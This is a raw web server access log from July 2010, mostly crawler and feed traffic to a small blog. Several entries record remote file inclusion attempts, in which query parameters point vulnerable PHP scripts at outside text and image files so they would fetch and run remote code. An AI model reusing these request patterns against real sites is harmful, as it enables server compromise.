109.224.140.179 - - [30/Jul/2010:00:35:43 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.0.3, Ant.com Toolbar 1.3 Ubiquity/0.1.4"
74.125.154.85 - - [30/Jul/2010:00:42:52 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "AppEngine-Google; (+http://code.google.com/appengine; appid: networkedhub)"
72.14.199.142 - - [30/Jul/2010:00:46:26 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=6222257065574491199)"
203.110.240.131 - - [30/Jul/2010:00:49:36 +0000] "GET /blog/?p=191 HTTP/1.0" 403 308 "http://www.smsbuds.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.195.111.153 - - [30/Jul/2010:00:51:35 +0000] "GET /robots.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.111.153 - - [30/Jul/2010:00:51:36 +0000] "GET /blog/?p=494 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.97.35.175 - - [30/Jul/2010:00:53:11 +0000] "GET /blog/?feed=atom HTTP/1.1" 403 308 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
94.124.120.23 - - [30/Jul/2010:00:55:32 +0000] "POST /contact.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
94.124.120.23 - - [30/Jul/2010:00:55:47 +0000] "POST /logs/contact.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
94.124.120.23 - - [30/Jul/2010:00:55:47 +0000] "POST /logs/access.log.run%20%20/contact.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
208.115.111.244 - - [30/Jul/2010:00:57:26 +0000] "GET /robots.txt HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.111.153 - - [30/Jul/2010:01:04:28 +0000] "GET /blog/?p=47 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.224.208.148 - - [30/Jul/2010:01:07:23 +0000] "GET /blog/?p=422 HTTP/1.0" 403 308 "http://www.healthyedu.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.195.111.153 - - [30/Jul/2010:01:10:15 +0000] "GET /blog/?p=3 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.201.66.120 - - [30/Jul/2010:01:11:37 +0000] "GET /logs/access.log HTTP/1.1" 200 2636 "http://blog.mug-uk.co.uk/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.234.23.94 - - [30/Jul/2010:01:23:28 +0000] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
218.234.23.94 - - [30/Jul/2010:01:23:28 +0000] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 344 "-" "Mozilla/5.0"
218.234.23.94 - - [30/Jul/2010:01:23:28 +0000] "GET /logs/access.log.run%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://www.joodsmaastricht.nl/idx.txt? HTTP/1.1" 404 361 "-" "Mozilla/5.0"
95.133.78.168 - - [30/Jul/2010:01:26:43 +0000] "GET /blog/ HTTP/1.0" 403 308 "http://blog.mug-uk.co.uk/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
95.133.78.168 - - [30/Jul/2010:01:26:43 +0000] "GET / HTTP/1.0" 200 727 "http://blog.mug-uk.co.uk/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
67.195.111.153 - - [30/Jul/2010:01:34:07 +0000] "GET /blog/?p=318 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
109.224.140.179 - - [30/Jul/2010:01:37:29 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.0.3, Ant.com Toolbar 1.3 Ubiquity/0.1.4"
213.180.207.227 - - [30/Jul/2010:01:42:10 +0000] "GET / HTTP/1.1" 200 727 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)"
213.180.207.227 - - [30/Jul/2010:01:42:10 +0000] "GET /favicon.ico HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)"
74.125.154.82 - - [30/Jul/2010:01:43:36 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "AppEngine-Google; (+http://code.google.com/appengine; appid: networkedhub)"
72.14.199.142 - - [30/Jul/2010:01:46:26 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=6222257065574491199)"
207.46.13.49 - - [30/Jul/2010:01:51:47 +0000] "GET /robots.txt HTTP/1.1" 404 309 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.109.96.188 - - [30/Jul/2010:01:53:25 +0000] "GET /logs/access.log.run%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 364 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:01:53:25 +0000] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:01:53:26 +0000] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:01:54:24 +0000] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:01:54:24 +0000] "GET /logs/access.log.run%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 364 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:01:54:24 +0000] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
91.201.66.120 - - [30/Jul/2010:01:54:31 +0000] "GET /logs/access.log HTTP/1.1" 200 6149 "http://blog.mug-uk.co.uk/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
78.110.50.110 - - [30/Jul/2010:01:56:08 +0000] "GET /logs/access.log.run%20%20///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
78.110.50.110 - - [30/Jul/2010:01:56:08 +0000] "GET ///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
78.110.50.110 - - [30/Jul/2010:01:56:08 +0000] "GET /logs///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
67.195.111.153 - - [30/Jul/2010:01:56:08 +0000] "GET /blog/?p=874 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.14.192.1 - - [30/Jul/2010:01:59:39 +0000] "GET /blog/?feed=rss2 HTTP/1.1" 403 308 "-" "AppEngine-Google; (+http://code.google.com/appengine; appid: networkedhub)"
78.110.50.110 - - [30/Jul/2010:02:02:07 +0000] "GET /logs/access.log.run///appserv/main.php?appserv_root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
67.195.111.153 - - [30/Jul/2010:02:06:15 +0000] "GET /blog/?p=7 HTTP/1.0" 403 308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.80.194.38 - - [30/Jul/2010:02:06:56 +0000] "GET / HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.0.0; YPC 3.2.0; (R1 1.5))"
208.115.111.244 - - [30/Jul/2010:02:12:24 +0000] "GET /blog/?p=194 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.244 - - [30/Jul/2010:02:12:28 +0000] "GET /blog/?p=196 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.244 - - [30/Jul/2010:02:12:33 +0000] "GET /blog/?p=412 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.244 - - [30/Jul/2010:02:12:38 +0000] "GET /blog/?p=568 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.244 - - [30/Jul/2010:02:12:44 +0000] "GET /blog/?p=739 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.244 - - [30/Jul/2010:02:12:49 +0000] "GET /blog/?p=798 HTTP/1.1" 403 308 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
86.109.96.188 - - [30/Jul/2010:02:12:56 +0000] "GET /logs/access.log.run////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 362 "-" "Mozilla/5.0"
86.109.96.188 - - [30/Jul/2010:02:13:10 +0000] "GET /logs/access.log.run////skin/ggambo7002_board/comment_modify.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 362 "-" "Mozilla/5.0"
207.46.13.49 - - [30/Jul/2010:02:16:54 +0000] "GET /blog/?cat=10 HTTP/1.1" 403 308 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.188.226.25 - - [30/Jul/2010:02:24:53 +0000] "GET /blog/?p=139 HTTP/1.1" 403 308 "-" "-"
124.188.226.25 - - [30/Jul/2010:02:24:53 +0000] "GET /blog/?p=139 HTTP/1.1" 403 308 "-" "-"
124.188.226.25 - - [30/Jul/2010:02:24:54 +0000] "GET /blog/?p=139 HTTP/1.1" 403 308 "-" "-"
38.107.191.115 - - [30/Jul/2010:02:29:45 +0000] "GET /robots.txt HTTP/1.1" 404 309 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:29:50 +0000] "GET /logs/domain.Feb.html HTTP/1.1" 200 145944 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:29:55 +0000] "GET /blog/?p=870 HTTP/1.1" 403 308 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:30:00 +0000] "GET /logs/err.Feb.log.gz HTTP/1.1" 200 118406 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
95.134.55.225 - - [30/Jul/2010:02:30:02 +0000] "GET /blog/?p=647 HTTP/1.0" 403 308 "http://blog.mug-uk.co.uk/blog/?p=647" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000"
95.134.55.225 - - [30/Jul/2010:02:30:03 +0000] "GET / HTTP/1.0" 200 727 "http://blog.mug-uk.co.uk/blog/?p=647" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000"
38.107.191.119 - - [30/Jul/2010:02:30:08 +0000] "GET /logs/err.Oct.log.gz HTTP/1.1" 200 119120 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:30:14 +0000] "GET /logs/err.Mar.log.gz HTTP/1.1" 200 156489 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:30:20 +0000] "GET /logs/err.Jul.log.gz HTTP/1.1" 200 36619 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:30:25 +0000] "GET /logs/err.log.run HTTP/1.1" 200 2794306 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:30:35 +0000] "GET /logs/domain.Apr.html HTTP/1.1" 200 141302 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.119 - - [30/Jul/2010:02:30:40 +0000] "GET /logs/domain.Mar.html HTTP/1.1" 200 143759 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:30:46 +0000] "GET /logs/domain.May.html HTTP/1.1" 200 146687 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:30:51 +0000] "GET /logs/access.Sep.log.gz HTTP/1.1" 200 391924 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:30:57 +0000] "GET /logs/ HTTP/1.1" 200 8803 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:31:02 +0000] "GET /logs/err.Apr.log.gz HTTP/1.1" 200 112405 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.119 - - [30/Jul/2010:02:31:06 +0000] "GET /logs/err.Dec.log.gz HTTP/1.1" 200 65853 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:31:12 +0000] "GET /logs/err.Sep.log.gz HTTP/1.1" 200 63262 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:31:17 +0000] "GET /logs/access.Dec.log.gz HTTP/1.1" 200 421803 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:31:24 +0000] "GET /logs/access.Apr.log.gz HTTP/1.1" 200 534976 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:31:32 +0000] "GET /blog/wp-login.php HTTP/1.1" 403 320 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.119 - - [30/Jul/2010:02:31:36 +0000] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 403 343 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:31:41 +0000] "GET /logs/domain.Jun.html HTTP/1.1" 200 142636 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:31:46 +0000] "GET /logs/domain.Aug.html HTTP/1.1" 200 170330 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:31:50 +0000] "GET /logs/access.Mar.log.gz HTTP/1.1" 200 634859 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:31:57 +0000] "GET /logs/access.Jul.log.gz HTTP/1.1" 200 369876 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.119 - - [30/Jul/2010:02:32:03 +0000] "GET /logs/domain.html HTTP/1.1" 200 123792 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:32:07 +0000] "GET /logs/access.Oct.log.gz HTTP/1.1" 200 580249 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.116 - - [30/Jul/2010:02:32:14 +0000] "GET /logs/access.Feb.log.gz HTTP/1.1" 200 605510 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.117 - - [30/Jul/2010:02:32:22 +0000] "GET /logs/domain.Nov.html HTTP/1.1" 200 125624 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.118 - - [30/Jul/2010:02:32:26 +0000] "GET /blog/?p=827 HTTP/1.1" 403 308 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.119 - - [30/Jul/2010:02:32:30 +0000] "GET /logs/access.May.log.gz HTTP/1.1" 200 506276 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
38.107.191.115 - - [30/Jul/2010:02:32:38 +0000] "GET /logs/err.Aug.log.gz HTTP/1.1" 200 59395 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"